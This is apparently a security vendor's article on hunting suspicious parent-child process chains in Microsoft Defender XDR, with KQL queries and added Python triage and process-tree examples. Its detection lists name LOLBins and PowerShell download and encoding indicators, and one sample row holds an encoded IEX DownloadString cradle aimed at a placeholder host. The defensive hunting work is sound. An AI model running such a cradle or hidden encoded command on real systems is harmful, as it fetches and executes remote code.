Agent Foskett • Microsoft Defender XDR • DeviceProcessEvents

The Process Tree Told The Real Story

The antivirus alert never triggered. The file looked legitimate. Signed by Microsoft. No malware verdict. No obvious warning.

But one process launched another. Then another. Then PowerShell spawned silently in the background.

The dashboard looked quiet. The process tree told the real story.

This Agent Foskett investigation explores how defenders use Microsoft Defender XDR, DeviceProcessEvents and KQL to follow parent and child processes, uncover suspicious execution chains and investigate what really happened on an endpoint.

Agent Foskett investigates a suspicious process tree in Microsoft Defender XDR
Briefing summary

A single process can look harmless. The real story appears when defenders follow what launched it, what it launched next and whether the execution chain matches normal user behaviour.

Follow parent and child processes
Hunt suspicious LOLBin chains
Use DeviceProcessEvents with KQL
🚨 One process rarely tells the whole story.
Attackers often hide inside legitimate Windows processes. The process tree shows whether trusted tools were used in an untrusted way.

Why process trees matter in Microsoft Defender XDR

Endpoint investigations are not just about whether a file is malicious. A process tree helps defenders understand execution flow: what started first, what launched next and whether a normal-looking process became part of something suspicious.
The parent process gives context: PowerShell launched from an administrator console is different from PowerShell launched by Word, Outlook, Teams, mshta or a browser process.
The child process shows intent: a trusted process becomes suspicious when it spawns scripting engines, downloads content, executes encoded commands or reaches out to unknown infrastructure.
The chain reveals behaviour: the real signal often comes from the sequence, not the individual process. One weak signal becomes stronger when the chain is viewed together.

First hunt: suspicious process chains

Start by looking for processes commonly abused during attacks. The goal is not to declare every command malicious. The goal is to find execution chains that deserve investigation.
suspicious-process-chains.kql
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe")
| project Timestamp,
          DeviceName,
          AccountName,
          FileName,
          ProcessCommandLine,
          InitiatingProcessFileName,
          InitiatingProcessCommandLine,
          InitiatingProcessParentFileName
| order by Timestamp desc
What to review: look for unusual parent processes, suspicious command lines, unexpected users, odd devices and process chains that do not match normal business activity.
Why it matters: legitimate tools are often abused because they already exist inside Windows and may not trigger a simple malware verdict.
Best next pivot: pivot into network events, file events, registry changes and sign-in activity to see whether the process chain was part of a wider compromise.

Second hunt: encoded PowerShell and command-line indicators

Encoded commands, execution bypasses and download behaviour can be legitimate in rare cases, but they deserve attention when launched from unusual parents or user-facing applications.
encoded-powershell-review.kql
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe", "pwsh.exe", "cmd.exe")
| where ProcessCommandLine has_any ("-enc", "encodedcommand", "bypass", "downloadstring", "invoke-webrequest", "iex")
| project Timestamp, DeviceName, AccountName,
          FileName, ProcessCommandLine,
          InitiatingProcessFileName, InitiatingProcessCommandLine
| order by Timestamp desc

When legitimate Microsoft-signed processes become suspicious

A signed Microsoft binary is not automatically safe in every context. Attackers often use trusted Windows tools because they blend into normal administration and may bypass simple allow/block thinking.
rundll32 can be abused: rundll32.exe is legitimate, but suspicious when it launches strange DLL paths, remote content, unusual scripts or unknown parent-child combinations.
Office apps can start the chain: Word, Excel, Outlook or Teams spawning scripting tools is a very different story from normal document editing or collaboration.
Browsers can be involved: a browser download followed by script execution, archive extraction and suspicious process spawning can reveal the path from user action to endpoint execution.

Third hunt: Office or browser spawning scripting tools

This query looks for user-facing applications that launch scripting engines or command shells. These events should be reviewed carefully because they can show the bridge between phishing, downloads and endpoint execution.
office-browser-to-script-chain.kql
DeviceProcessEvents
| where Timestamp > ago(14d)
| where InitiatingProcessFileName in~ ("winword.exe", "excel.exe", "outlook.exe", "teams.exe", "chrome.exe", "msedge.exe")
| where FileName in~ ("powershell.exe", "cmd.exe", "wscript.exe", "mshta.exe", "rundll32.exe")
| project Timestamp, DeviceName, AccountName,
          InitiatingProcessFileName, FileName,
          ProcessCommandLine, InitiatingProcessCommandLine
| order by Timestamp desc
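The three hunts above filter the same DeviceProcessEvents columns from different angles: commonly abused binaries (first hunt), command-line indicators (second hunt) and user-facing parents (third hunt). The Python triage routine below is an added example, not code from this page or from GEMXIT. It applies all three checks to rows shaped like the query output and additionally decodes any -EncodedCommand argument (base64 of UTF-16LE, which is what PowerShell expects) so the hidden command line can be reviewed next to the visible one. The column names are the real DeviceProcessEvents columns the queries project; the sample rows, device and account names, PIDs and the example.invalid URL are constructed, and the function names (triage_event, hunt, decode_encoded_command, encode_powershell) are hypothetical.

```python
import base64
import re

# Binaries the page's first hunt treats as commonly abused (shells, script hosts, LOLBins).
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
           "mshta.exe", "rundll32.exe"}
# User-facing parents from the third hunt: document editors, mail, chat and browsers.
USER_FACING_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "teams.exe",
                       "chrome.exe", "msedge.exe"}
# Command-line tokens from the second hunt.
CMDLINE_INDICATORS = ("-enc", "encodedcommand", "bypass", "downloadstring",
                      "invoke-webrequest", "iex")
# Matches -e / -ec / -enc / -encodedcommand followed by a base64 blob.
ENC_ARG = re.compile(r"(?i)-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)")


def encode_powershell(command):
    """Encode text the way PowerShell's -EncodedCommand expects: base64 of UTF-16LE."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # bad padding or not UTF-16LE text
        return None


def triage_event(ev):
    """Score one DeviceProcessEvents-style row: which hunts surface it and why."""
    child = ev["FileName"].lower()
    parent = ev["InitiatingProcessFileName"].lower()
    grandparent = ev["InitiatingProcessParentFileName"].lower()
    reasons = []
    if child in LOLBINS:
        reasons.append(f"lolbin:{child}")
    if child in LOLBINS and parent in USER_FACING_PARENTS:
        reasons.append(f"user-facing-parent:{parent}")
    decoded = decode_encoded_command(ev["ProcessCommandLine"])
    if decoded is not None:
        reasons.append("encoded-command")
    # Search the visible command line (blob replaced so base64 noise cannot
    # produce accidental hits) plus the decoded payload for the indicator tokens.
    searchable = ENC_ARG.sub("-enc <blob>", ev["ProcessCommandLine"]).lower()
    if decoded:
        searchable += " " + decoded.lower()
    indicators = [t for t in CMDLINE_INDICATORS if t in searchable]
    if indicators:
        reasons.append("cmdline:" + ",".join(indicators))
    return {"chain": f"{grandparent} -> {parent} -> {child}", "reasons": reasons,
            "indicators": indicators, "decoded": decoded}


def hunt(events):
    """Rank rows that gave at least one reason, most reasons first."""
    results = [triage_event(ev) for ev in events]
    return sorted((r for r in results if r["reasons"]),
                  key=lambda r: len(r["reasons"]), reverse=True)


# Constructed sample rows shaped like DeviceProcessEvents columns; not real telemetry.
DOWNLOAD_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
SAMPLE_EVENTS = [
    {"Timestamp": "2026-05-28T09:14:02Z", "DeviceName": "WS-0421", "AccountName": "jdoe",
     "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -NoP -W Hidden -enc " + encode_powershell(DOWNLOAD_CRADLE),
     "InitiatingProcessFileName": "winword.exe",
     "InitiatingProcessCommandLine": '"WINWORD.EXE" /n "C:\\Users\\jdoe\\Downloads\\invoice.docm"',
     "InitiatingProcessParentFileName": "explorer.exe"},
    {"Timestamp": "2026-05-28T09:20:11Z", "DeviceName": "WS-0421", "AccountName": "SYSTEM",
     "FileName": "rundll32.exe",
     "ProcessCommandLine": "rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL",
     "InitiatingProcessFileName": "svchost.exe",
     "InitiatingProcessCommandLine": "svchost.exe -k netsvcs",
     "InitiatingProcessParentFileName": "services.exe"},
    {"Timestamp": "2026-05-28T10:02:45Z", "DeviceName": "SRV-ADM01", "AccountName": "it-admin",
     "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1",
     "InitiatingProcessFileName": "cmd.exe",
     "InitiatingProcessCommandLine": "cmd.exe",
     "InitiatingProcessParentFileName": "explorer.exe"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["chain"], hit["reasons"], hit["decoded"] or "")
```

The Word-spawned PowerShell row scores on downloadstring and iex even though neither string appears in the raw ProcessCommandLine, because the decoded payload is searched with the same tokens as the visible one; the SYSTEM-context rundll32 row only trips the LOLBin filter and the admin inventory script only the bypass token, which is the ranking an analyst would want before pivoting into network and file events.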

Fourth hunt: build a simple endpoint timeline

Once you find a suspicious process, build a timeline around the device and account. This helps show whether the process was isolated noise or part of a wider chain of execution.
device-process-timeline.kql
DeviceProcessEvents
| where Timestamp between (datetime(2026-05-28T00:00:00Z) .. datetime(2026-05-28T23:59:59Z))
| where DeviceName == "DEVICE-NAME-HERE"
| project Timestamp,
          AccountName,
          FileName,
          ProcessCommandLine,
          InitiatingProcessFileName,
          InitiatingProcessCommandLine
| order by Timestamp asc
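The timeline query returns a flat list; turning it back into a tree means linking each row's InitiatingProcessId to another row's ProcessId. The Python below is an added example, not the page's or GEMXIT's code. It takes constructed rows carrying the real DeviceProcessEvents columns ProcessId and InitiatingProcessId, scopes them to one device and one day as the query does, then answers the two questions the investigation keeps asking: what launched this process (ancestry) and what it launched next (descendants). Device names, PIDs, accounts and command lines are constructed, and the function names (build_tree, roots, ancestry, descendants, render_tree) are hypothetical.

```python
# Constructed DeviceProcessEvents-style rows; not real telemetry.
# ISO-8601 UTC timestamps sort chronologically as plain strings.
TIMELINE_ROWS = [
    {"Timestamp": "2026-05-28T09:13:40Z", "DeviceName": "WS-0421", "AccountName": "jdoe",
     "FileName": "winword.exe", "ProcessId": 4120,
     "ProcessCommandLine": '"WINWORD.EXE" /n "C:\\Users\\jdoe\\Downloads\\invoice.docm"',
     "InitiatingProcessFileName": "explorer.exe", "InitiatingProcessId": 2044},
    {"Timestamp": "2026-05-28T09:14:02Z", "DeviceName": "WS-0421", "AccountName": "jdoe",
     "FileName": "powershell.exe", "ProcessId": 5210,
     "ProcessCommandLine": "powershell.exe -NoP -W Hidden -enc <base64 omitted>",
     "InitiatingProcessFileName": "winword.exe", "InitiatingProcessId": 4120},
    {"Timestamp": "2026-05-28T09:14:05Z", "DeviceName": "WS-0421", "AccountName": "jdoe",
     "FileName": "cmd.exe", "ProcessId": 5304,
     "ProcessCommandLine": "cmd.exe /c whoami",
     "InitiatingProcessFileName": "powershell.exe", "InitiatingProcessId": 5210},
    {"Timestamp": "2026-05-28T09:15:30Z", "DeviceName": "WS-0421", "AccountName": "jdoe",
     "FileName": "notepad.exe", "ProcessId": 5400,
     "ProcessCommandLine": "notepad.exe",
     "InitiatingProcessFileName": "explorer.exe", "InitiatingProcessId": 2044},
    # Another device reusing PID 5304: only a per-device index keeps chains straight.
    {"Timestamp": "2026-05-28T09:15:31Z", "DeviceName": "WS-0999", "AccountName": "other",
     "FileName": "cmd.exe", "ProcessId": 5304,
     "ProcessCommandLine": "cmd.exe",
     "InitiatingProcessFileName": "explorer.exe", "InitiatingProcessId": 1000},
]


def build_tree(rows, device, start=None, end=None):
    """Index one device's rows (optionally inside a time window) by ProcessId and
    map each parent pid to its child pids in time order."""
    scoped = [r for r in rows if r["DeviceName"] == device
              and (start is None or r["Timestamp"] >= start)
              and (end is None or r["Timestamp"] <= end)]
    scoped.sort(key=lambda r: r["Timestamp"])
    by_pid = {r["ProcessId"]: r for r in scoped}
    children = {}
    for r in scoped:
        children.setdefault(r["InitiatingProcessId"], []).append(r["ProcessId"])
    return by_pid, children


def roots(by_pid):
    """Processes whose parent has no row in the window (it started earlier)."""
    return [pid for pid, r in by_pid.items() if r["InitiatingProcessId"] not in by_pid]


def ancestry(by_pid, pid):
    """Walk InitiatingProcessId links upward; returns names from the oldest known parent down."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        row = by_pid[pid]
        chain.append(row["FileName"])
        parent = row["InitiatingProcessId"]
        if parent not in by_pid:
            # The parent predates the window, so its name only survives on the child's row.
            chain.append(row["InitiatingProcessFileName"])
        pid = parent
    return list(reversed(chain))


def descendants(children, pid):
    """Every process spawned directly or indirectly by pid, depth-first in time order."""
    out, stack = [], list(reversed(children.get(pid, [])))
    while stack:
        p = stack.pop()
        out.append(p)
        stack.extend(reversed(children.get(p, [])))
    return out


def render_tree(by_pid, children, pid, depth=0):
    """Indented, time-ordered lines for pid and everything under it."""
    row = by_pid[pid]
    lines = [f"{'  ' * depth}{row['Timestamp'][11:19]} {row['FileName']} (pid {pid}) "
             f"{row['AccountName']}: {row['ProcessCommandLine']}"]
    for child in children.get(pid, []):
        lines.extend(render_tree(by_pid, children, child, depth + 1))
    return lines


if __name__ == "__main__":
    by_pid, children = build_tree(TIMELINE_ROWS, "WS-0421",
                                  "2026-05-28T00:00:00Z", "2026-05-28T23:59:59Z")
    for root in roots(by_pid):
        print("\n".join(render_tree(by_pid, children, root)))
    print("ancestry of 5304:", " -> ".join(ancestry(by_pid, 5304)))
```

Filtering by DeviceName before indexing matters because process IDs are only unique per machine and are reused over time; the constructed rows include a second device with the same PID 5304 to show that a cross-device index would mislink the chain. Within one device, pairing a pid with its creation time is the safer key on a busy host, but for a single-day window of a workstation the plain pid is usually enough to reconstruct the explorer to Word to PowerShell to cmd chain the query would surface.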

What the process tree can prove

The process tree does not just show that something ran. It can help explain how it started, which user context was involved, whether a document or browser event triggered it and what the endpoint did next.
Initial access clues: a suspicious parent may point back to phishing, a downloaded file, a malicious document, a browser session or a user action.
Execution behaviour: the chain can show whether the endpoint used PowerShell, cmd, mshta, rundll32 or other trusted tools in an unusual way.
Containment decisions: a clear process tree helps defenders decide whether to isolate a device, reset credentials, block indicators or escalate the incident.

The Agent Foskett investigator mindset

Do not stop at the file name. Do not stop at the signature. Do not stop at the first alert. Follow the behaviour until the story makes sense.
Ask what launched it: every suspicious process needs context. Parent process, command line and user context often explain the risk better than the file name alone.
Follow what happened next: look for child processes, network calls, dropped files, persistence attempts and account activity after the suspicious event.
Correlate the weak signals: one event may look harmless. A chain of unusual events can tell a much stronger incident story.

How GEMXIT approaches endpoint investigations

GEMXIT helps organisations use Microsoft Defender XDR telemetry to move beyond simple alert review and into practical endpoint investigation workflows.
We review endpoint visibility: we help check whether Defender telemetry is available, useful, retained and connected to the wider Microsoft security picture.
We build hunting logic: we help turn DeviceProcessEvents, DeviceNetworkEvents, DeviceFileEvents and identity telemetry into real investigation workflows.
We improve response readiness: we help teams understand what to isolate, what to reset, what to block and what evidence to preserve during an incident.
The file looked normal. The chain did not.
GEMXIT helps organisations investigate Microsoft Defender XDR endpoint telemetry, process trees, suspicious execution chains and KQL hunting workflows.

Final thought

A process name can lie.

A file signature can give false comfort.

A quiet dashboard can make everything feel fine.

But the chain remembers.

What launched first. What spawned next. Which user context was used. Which command line ran. Which tool reached out.

The process tree told the real story.
At GEMXIT: we help organisations investigate Microsoft Defender XDR, Microsoft Sentinel, Entra ID, endpoint telemetry, process execution chains and real-world security operations workflows.
Agent Foskett mindset: the question is not only: “Was the file malicious?”

It is: “What did the process tree reveal?”

This Agent Foskett investigation explains how Microsoft Defender XDR process trees, DeviceProcessEvents and KQL can reveal suspicious parent and child process behaviour that traditional antivirus alerts may not explain.

Microsoft Defender XDR process tree investigation

GEMXIT helps organisations investigate endpoint process chains, suspicious PowerShell activity, rundll32 behaviour, LOLBin execution, parent process context and Microsoft Defender Advanced Hunting telemetry.

DeviceProcessEvents and endpoint threat hunting

DeviceProcessEvents can help defenders understand process command lines, initiating processes, user context, device behaviour and execution timelines during Microsoft Defender XDR investigations.